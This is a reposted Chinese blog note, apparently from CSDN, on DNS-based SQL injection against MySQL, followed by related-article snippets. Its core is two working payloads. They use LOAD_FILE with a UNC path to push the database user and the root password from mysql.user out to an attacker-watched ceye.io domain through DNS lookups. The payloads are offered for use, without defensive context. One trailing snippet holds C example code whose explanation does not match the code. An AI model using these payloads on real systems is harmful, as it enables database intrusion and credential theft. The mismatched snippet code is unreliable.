小结--dns注入

最新推荐文章于 2023-12-24 15:20:56 发布
最新推荐文章于 2023-12-24 15:20:56 发布
阅读量172 收藏
点赞数
文章标签: 运维 数据库
原文链接:http://www.cnblogs.com/spark-xl/p/9094674.html
版权

0x01 杂言

最近实在是太忙了,考试都排满了,晚上刚考完,补一下昨天的东西,写一下dns注入。
我们知道在盲注的时候,要用脚本去跑,在测试的时候效率就不是很高,这时候用dns注入往往事半功倍

0x02 payload

这里直接贴一下payload

LOAD_FILE(CONCAT(0x5C5C,(HEX(USER())),0x2E3563733076642E636579652E696F5C313233))

下面这个是没有引号的
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.[图片]mysql.ip.port.xxxx.ceye.io\\abc'));

这里上面的地址可以用ceye.io这个网站去看dns的解析记录

转载于:https://www.cnblogs.com/spark-xl/p/9094674.html

weixin_30300523
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Dns注入
笔墨稠思
11-25 2225
Dns注入(windowns服务器(支持smb服务) mysql数据库) 在我们发送请求时,将域名转换为对应的ip 例如 https://baidu.com 他会将这个域名解析为后面这串数字 220.181.38.251,从而帮助我们找到百度的服务器 Dns注入的原理 在我们对这个域名进行请求,Dns对这个域名进行解析时,可能会在日志中记录请求方的ip和请求的目录,我们可以通过子查询,将我们想要的内容拼接到域名内,让load_file()去访问共享文件,此时,被访问的域名被记录,此时可以去查看Dns服务
DNS注入
天上掉馅饼
03-17 345
DNS注入
PHP中PDO连接数据库中各种DNS设置方法小结
12-18
标题中的“PHP中PDO连接数据库中各种DNS设置方法小结”指的是PHP中使用PDO(PHP Data Objects)扩展连接不同类型的数据库时,如何设置DNS(Data Source Name)的详细概述。DNS是配置数据库连接的重要部分,它包含了...
SQL注入攻击与防御
10-04
1.5 本章小结 18 1.6 快速解决方案 18 1.7 常见问题解答 19 第2章 SQL注入测试 21 2.1 概述 22 2.2 寻找SQL注入 22 2.2.1 借助推理进行测试 22 2.2.2 数据库错误 29 2.2.3 应用响应 38 2.2.4 SQL盲注 42 2.3 确认...
SQL注入攻击与防御(安全技术经典译丛)
02-19
 1.5 本章小结  1.6 快速解决方案  1.7 常见问题解答 第2章 SQL注入测试  2.1 概述  2.2 寻找SQL注入  2.2.1 借助推理进行测试  2.2.2 数据库错误  2.2.3 应用响应  2.2.4 SQL盲注  2.3 确认SQL...
MSCS+FailSafe ORACLE数据库双机集群做HA小结.doc
12-19
### MSCS+FailSafe Oracle数据库双机集群实现高可用性(HA)小结 #### 一、概述 本文档旨在总结使用Microsoft Cluster Service (MSCS) 和 FailSafe 技术来构建Oracle数据库双机集群以实现高可用性的过程。通过这种...
医院分诊管理
03-15
对于出院患者,系统会生成出院小结,方便后续跟踪和回访。 此外,考虑到医疗数据的敏感性,系统应具备强大的安全机制,如数据加密、访问控制等,确保患者隐私不被泄露。系统还应该具备一定的扩展性和可升级性,以便...
mysql——DNS注入
qq_45300786的博客
08-09 1722
DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 DNS注入的核心,将盲注转化为显错注入 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 比如 ox.qidao.com => DNS记录了这个请求, 那么我们也可以让mysql也能发出请求,DNS也会记录 ...
web安全入门(第五章-3)dns注入
Yzz_的博客
06-02 325
一、DNSLOG的函数解析 1,基本 DNS(协议 域名 -> IP转换) 日志:基本上所有程序都会记录日志 DNS 他实际上也是有日志的 补充:问:DNSlog注入是不是在linx系统可不可以用SMB服务? (全称是Server Message Block , 用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居由它实现。) 答:在linx里面默认不可以使用,因为linx没有这个服务 2,函数用法: select
SQL注入(Dns注入)---zkaq
weixin_38237216的博客
04-11 1773
1.概念 1.DNS-log:DNS是解析域名的,log是日志记录,DNS-log是记录域名解析记录日志 2.使用场景:在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 3.涉及的函数:LOAD_FILE():读取文件的函数—读取文件并返回文件内容为字符串 ​ a.配置文件中的参数secure_file_priv= ​ b.高版本mysql中会限制 ​ c.既然会被限制那有什么用呢?但是也会存在下面几种情况 有的版本会自动开启 有的网站需要
【渗透测试】DNSLog注入
ssrf
10-25 3769
目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、p
SQL注入篇——dns回显注入
爱国小白帽
02-10 1973
dns回显注入的使用场景 当目标无显示位也无错误回显时便可使用此方法 1、首先使用网站http://www.dnslog.cn/点击此处获取dns地址 2、将获取到的地址复制填入SQL语句中执行 注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可 注入语句: id=1’ and load_file(concat("\\",(database()),".2bmfvu.dnslo...
DNS中的SQL注入攻击
netsec_steven的博客
10-09 1931
0x00 前言 原文地址:http://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf 原文作者: Miroslav tampar 本文描述了一种利用DNS解析过程获取恶意SQL查询结果的先进的SQL注入技术。带有sql查询结果的DNS请求最终被攻击者控制的远程域名服务器拦截并提取出宝贵的数据。 开源SQL注入工具—SqlMap现在已
深入探讨DNS数据包注入DNS中毒攻击检测 (C/C++代码实现)
最新发布
chen1415886044的博客
12-24 1258
DNS数据包注入DNS中毒攻击是网络安全领域中两种重要的攻击方式。DNS数据包注入是一种攻击手段,通过向DNS服务器发送恶意数据包,以篡改其正常功能。而DNS中毒攻击则是一种针对DNS缓存的攻击,目的是通过向DNS服务器的缓存中添加恶意记录,从而使用户访问到错误的网站。
DNSlog注入原理
sjp_1996的博客
04-20 3219
DNSlog注入原理及实验 遵守我国网络安全法,仅用于渗透测试交流学习DNS解析过程 用户输入域名,浏览器知道是域名,然后通过DNS解析为IP地址,最后浏览器通过IP地址访问服务器。IP地址与域名是应是一对多映射的关系。 DNSlog的产生 DNS在解析的过程中产生日志文件,这些日志文件记录了访问时间、域名、IP地址等信息内容。 实验 1、公共DNS免费平台:www.DNSlog.con,点击GetSubDomain,会随机生成一个域名。 此时打开CMD,用ping命令,ping通这个域名。因为我的
c-ares windows DNS解析
05-20
c-ares 是一个 C 语言的异步 DNS 解析库,它可以在 Windows 平台上使用。在 Windows 上,c-ares 使用操作系统提供的 DNS 解析服务,即使用了 Windows 的 DNS Client 服务进行 DNS 解析。 如果你想在 Windows 平台上使用 c-ares 进行 DNS 解析,需要使用 c-ares 的库文件,并在代码中使用 c-ares 的 API 进行 DNS 解析操作。在使用 c-ares 进行 DNS 解析时,需要注意以下几点: 1. 你需要在程序中初始化 c-ares 库,并在程序结束前清理 c-ares 库资源。 2. 在进行 DNS 解析操作时,需要创建一个 c-ares 查询对象(ares_query),并设置回调函数来处理查询结果。 3. c-ares 的回调函数是异步执行的,因此需要在回调函数中进行线程同步操作,以保证程序正确性。 下面是一个使用 c-ares 进行 DNS 解析的示例代码: ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ares.h> static void callback(void *arg, int status, int timeouts, struct hostent *host) { if (status == ARES_SUCCESS) { printf("Found address for %s:\n", (char *) arg); for (int i = 0; host->h_addr_list[i]; ++i) { printf("%s\n", inet_ntoa(*(struct in_addr *) host->h_addr_list[i])); } } else { printf("Failed to lookup %s: %s\n", (char *) arg, ares_strerror(status)); } } int main(int argc, char **argv) { ares_channel channel; int status; if (argc != 2) { fprintf(stderr, "Usage: %s <hostname>\n", argv[0]); return 1; } status = ares_library_init(ARES_LIB_INIT_ALL); if (status != ARES_SUCCESS) { fprintf(stderr, "ares_library_init: %s\n", ares_strerror(status)); return 1; } status = ares_init(&channel); if (status != ARES_SUCCESS) { fprintf(stderr, "ares_init: %s\n", ares_strerror(status)); return 1; } ares_query(channel, argv[1], ns_c_in, ns_t_a, callback, argv[1]); ares_free(channel); ares_library_cleanup(); return 0; } ``` 在上面的代码中,我们首先使用 ares_library_init() 函数初始化 c-ares 库,然后使用 ares_init() 函数创建一个 c-ares 查询通道(channel)。接着,我们调用 ares_query() 函数进行 DNS 查询操作。最后,我们使用 ares_free() 函数释放查询通道资源,并使用 ares_library_cleanup() 函数清理 c-ares 库资源。 在回调函数 callback() 中,我们根据查询结果输出查询到的 IP 地址或错误信息。注意,我们在回调函数中使用了互斥锁(mutex)来保证线程同步。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值